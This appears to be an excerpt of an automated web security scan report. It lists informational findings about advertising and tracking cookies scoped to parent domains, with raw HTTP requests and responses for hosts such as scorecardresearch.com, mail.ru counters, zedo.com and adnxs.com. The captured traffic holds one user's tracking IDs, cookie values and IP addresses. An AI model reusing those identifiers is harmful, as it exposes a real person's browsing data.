Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:23 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741403; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25091

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...

15.9. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?C1=8&C2=6035824&C3=1271511541440207100&C4=&C5=&C6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:22:00 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:22:00 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


15.10. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=88302011 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 14:20:21 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:20:21 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

15.11. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732016&c4=181106347&c5=1&c6=22&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&c9=&c10=&c15=&1303741232904 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:23:30 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 24-Apr-2013 14:23:30 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


15.12. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.mail.ru
Path:   /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133 HTTP/1.1
Host: bs.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; p=6PMGAE2r7QAA; VID=2Tinlz3w7bGs

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:32:03 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT
Expires: Mon, 25 Apr 2011 14:32:03 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://bs.mail.ru/count/108pZT9La4K40n00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133
Set-Cookie: searchuid=1981869761303741204; domain=.mail.ru; path=/; expires=Thu, 22-Apr-2021 14:32:03 GMT
Content-Length: 0


15.13. http://core1.node15.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core1.node15.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1446197;t=69;js=13;r=;j=true;s=1920*1200;d=16;rand=0.06563902948983014 HTTP/1.1
Host: core1.node15.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; searchuid=1981869761303741204; VID=2Tinlz3w7bGs; p=NOIGAEqT7AAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:47:44 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:47:44 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 885
Connection: close

GIF87a&...................................................................................................dddLLL......ppp...~~~.........ZZZyyymmm..............................???888...iii......PPP....
...[SNIP]...

15.14. http://core2.node12.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core2.node12.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1301840;t=234;js=13;r=;j=true;s=1920*1200;d=16;rand=0.6505313029047102 HTTP/1.1
Host: core2.node12.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; VID=2Tinlz3w7bGs; searchuid=1981869761303741204; p=pPUGAEqlaAAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:39:51 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:39:51 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1027
Connection: close

GIF87aX....../e&...*Y!......JsCmmm..........MSN.E.,.......,=....-`$...Aj$...Te..d. D................v.tDUB.~.,....X.......".di.(.....Z*..b.x....q..k#...<...l:....9Hx..A.q.L.`.B..L...dQ..lmf.....]-..3
...[SNIP]...

15.15. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=845B826,20|798_845#365;expires=Tue, 24 Apr 2012 15:14:03 GMT;domain=.zedo.com;path=/;
ETag: "1b633f4-7054-4942082502f40"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1492157159
Cache-Control: max-age=29594
Expires: Mon, 25 Apr 2011 23:27:18 GMT
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

15.16. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fc.ef.d4.cf.bd.a1.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1963260;js=13;r=;j=true;s=1920*1200;d=16;rand=0.3155316608026624 HTTP/1.1
Host: fc.ef.d4.cf.bd.a1.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:30:07 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tir3I2W_cms; path=/; expires=Tue, 26 Jul 2011 14:30:07 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;

15.17. http://goods.adnectar.com/analytics/get_avia_js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /analytics/get_avia_js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16 HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Status: 200
ETag: "643abe138f06b030650a5c28ca19bdb4"
X-Runtime: 1
Content-Length: 6324
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"

var exceptionmessage = null;
try {
var avia_already_defined = false;
if (typeof(_an_tracker) !== 'undefined') {
avia_already_defined = true;
}

// First, define JS versions of methods not
...[SNIP]...

15.18. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=4XoUrkfhFEDhehSuR-EUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAHSOBcgAAAAA.&tt_code=livejournal.com&udj=uf%28%27a%27%2C+9797%2C+1303741246%29%3Buf%28%27c%27%2C+47580%2C+1303741246%29%3Buf%28%27r%27%2C+173255%2C+1303741246%29%3Bppv%288991%2C+%278959360767911564416%27%2C+1303741246%2C+1303784446%2C+47580%2C+25553%29%3B&cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU.&referrer=http://www.livejournal.com/&pp=TbWDPgACKZsK5XeQflcean0rg75a9lJ4uX93wQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:20:47 GMT
Content-Length: 1454

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAA
...[SNIP]...

15.19. http://ib.adnxs.com/pxj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1303072666-9018543%7cMUID%3db506c07761d7465d924574124e3c14df%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
